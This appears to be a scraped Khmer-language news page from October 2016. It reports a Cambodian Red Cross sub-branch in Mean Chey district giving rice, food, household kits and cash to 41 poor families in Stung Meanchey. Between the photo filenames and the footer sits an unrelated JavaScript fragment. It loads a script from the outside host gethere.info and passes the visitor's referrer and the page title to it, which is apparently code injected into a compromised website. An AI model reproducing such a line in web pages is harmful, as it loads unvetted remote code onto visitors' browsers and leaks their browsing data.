ពលរដ្ឋទីទាល់ក្រ៤១គ្រួសារនៅសង្កាត់ស្ទឹងមានជ័យទទួលអំណោយ ពី លោក ឌី រ័ត្នខេមរុណ

ភ្នំពេញ៖ នៅព្រឹក ថ្ងៃទី ១១ ខែ តុលា ឆ្នាំ ២០១៦ ក្រុមការងារអនុសាខាកាកបាទក្រហមកម្ពុជា ខណ្ឌមានជ័យ ដឹកនាំដោយ លោក ឌី រ័ត្នខេមរុណ ប្រធានគណៈកម្មាធិការអនុសាខា បានចុះសួរសុខទុក្ខ និងនាំយកអំណោយមនុស្សធម៌របស់សម្តេចកិត្តិព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានី ហ៊ុនសែន ប្រធានកាកបាទក្រហមកម្ពុជា ទៅផ្តល់ជូន ពលរដ្ឋទីទាល់ក្រ មនុស្សចាស់ជរា មានជីវភាពខ្វះខាត ចំនួន៤១គ្រួសារ នៅសង្កាត់ស្ទឹងមានជ័យ។
ក្នុងនោះលោកប្រធានគណៈកម្មាធិការអនុសាខា បានលើកឡើងពីការយកចិត្តទុកដាក់គិតគូរខ្ពស់ពីសំណាក់សម្តេចកិត្តិព្រឹទ្ធបណ្ឌិតប្រធានកាកបាទក្រហមកម្ពុជា ចំពោះសុខទុក្ខប្រជាពលរដ្ឋ ដែលជួបប្រទះនូវការលំបាកនៅតាមមូលដ្ឋាន ។

អំណោយមនុស្សធម៌ដែលនាំមកផ្តល់ជូនរួមមាន៖
គ្រឿងឧបភោគ-បរិភោគ អង្ករ ៣០ គីឡូ មី១កេស  ត្រីខ ១យួរ ទឹកសុីអ៊ីវ ១យួរ ទឹកសុទ្ធ១យួរ សម្ភារប្រើប្រាស់ ឃីត១ មាន មុង ភួយ      ក្រមា សារ៉ុង  និង ថវិកា ២ មុឺនរៀលផងដែរ ៕

img_7597 img_7599 img_7600 img_7602 img_7613 img_7615 img_7616

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More